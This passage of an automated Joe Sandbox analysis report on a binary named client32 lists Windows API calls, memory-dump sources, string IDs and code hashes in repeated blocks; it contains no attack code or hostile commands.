                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeleteObject$DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp
                                                                                                                                                                                                    • API String ID: 3588104766-3522349108
                                                                                                                                                                                                    • Opcode ID: 05ba882851e8a1c765231e2ae23ec8e1740dad126d2f46d9102e33a8961f15be
                                                                                                                                                                                                    • Instruction ID: fe97197d1108f7aa45bd6dbf16deea5a32e3dd0819a72db8782ca70f672c0317
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ba882851e8a1c765231e2ae23ec8e1740dad126d2f46d9102e33a8961f15be
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC012574F42AABAAE711DFE1DCC8FD5BA999B0078CF040174F520A6149F774D1448F96
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,00000058,BBC4A55B), ref: 11141118
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1114112E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                                                                                    • API String ID: 104907563-3240211118
                                                                                                                                                                                                    • Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                                                                                    • Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ACF
                                                                                                                                                                                                      • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ADD
                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 1106719C
                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 110671A5
                                                                                                                                                                                                    • IsChild.USER32(00000000,00000000), ref: 110671B9
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Parent$Child
                                                                                                                                                                                                    • String ID: FixEHParent$_debug
                                                                                                                                                                                                    • API String ID: 3381959328-498807111
                                                                                                                                                                                                    • Opcode ID: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                                                                                    • Instruction ID: 19ed4bc464ac013ef3aede55ea0528bdf8a938b54301afc5030378f5434f72ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33F09636E01925679F01A6AD4C84DAFFADE9DC555830140E7FE25EB100ED609E01C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110335F8
                                                                                                                                                                                                    • GetClassNameA.USER32(?,?,00000400), ref: 11033626
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
                                                                                                                                                                                                    • API String ID: 2713866921-163732079
                                                                                                                                                                                                    • Opcode ID: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction ID: 7c0026f42908b5e278ccc52ab84e836bf453825b517ccc9397fc8abb106b0303
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b9e86a5835d1674b9f04b13084563b7e6818a03ecb2fa4b648010b3b217809c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0BB75E1162D6BDB00DB649D41FEEF76C9F05209F0000A4FF14A6141EA346A058BDA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(cenctrl.dll), ref: 110852BE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 110852D0
                                                                                                                                                                                                      • Part of subcall function 11085260: FreeLibrary.KERNEL32(00000000,?,110852E4), ref: 1108526A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                    • String ID: EDC$cenctrl.dll$cenctrl_protection
                                                                                                                                                                                                    • API String ID: 145871493-3137230561
                                                                                                                                                                                                    • Opcode ID: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction ID: d397d68d13e32483cc8c89d25abb01868daaac96927e0e05309bf2cb32c419b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F02278E0832367EB01AF38BC0978E7AC85B0231CF410437F845EA20AFD22E04047A3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageWindow$FindLongPostSend
                                                                                                                                                                                                    • String ID: IPTip_Main_Window
                                                                                                                                                                                                    • API String ID: 3445528842-293399287
                                                                                                                                                                                                    • Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                                                                                                    • Instruction ID: 6ed72df936b24ea30651ffc38d8a948eea9e1772f025cae554d715837251261a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E08638B81B36B6F33357144C8AFDE79549F05B65F108150F722BE1CDC7689440579A
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11031494
                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 110314B0
                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 110314D3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11031563
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110315C4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3664964396-0
                                                                                                                                                                                                    • Opcode ID: 7e0f89ef0d1c6a1de124f6a902f64ff07144520b1786306c7a49f958ccb4862b
                                                                                                                                                                                                    • Instruction ID: f3b86de38a560134af6e2d620d743e83d5971917c983db1a0387e640a4d59ee1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e0f89ef0d1c6a1de124f6a902f64ff07144520b1786306c7a49f958ccb4862b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9514FB1E01219AFCB50CFA8D985A9EFBF9FF48318F108529E515E7240E731A901CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 1107B0AC
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1107B0E8
                                                                                                                                                                                                    • PatBlt.GDI32(?,00000001,00000001,?,?,00F00021), ref: 1107B114
                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1107B11F
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1107B127
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Select$BrushCreateDeleteSolid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1979645813-0
                                                                                                                                                                                                    • Opcode ID: 51083f57169e83f1eebfa740879096ea01040600b4b67f05e2b13f848befb69a
                                                                                                                                                                                                    • Instruction ID: 11daceb90d8471e558a41104e13226b5f98e4c9b80a61d0fc10342814203a5b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51083f57169e83f1eebfa740879096ea01040600b4b67f05e2b13f848befb69a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2331E575700A16AFD701CF68CC91EAE37AAEBC8714F108159FA549B381DB71ED42CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5D7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5E4
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F649
                                                                                                                                                                                                    • EncodePointer.KERNEL32(11019A91,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F65D
                                                                                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F665
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
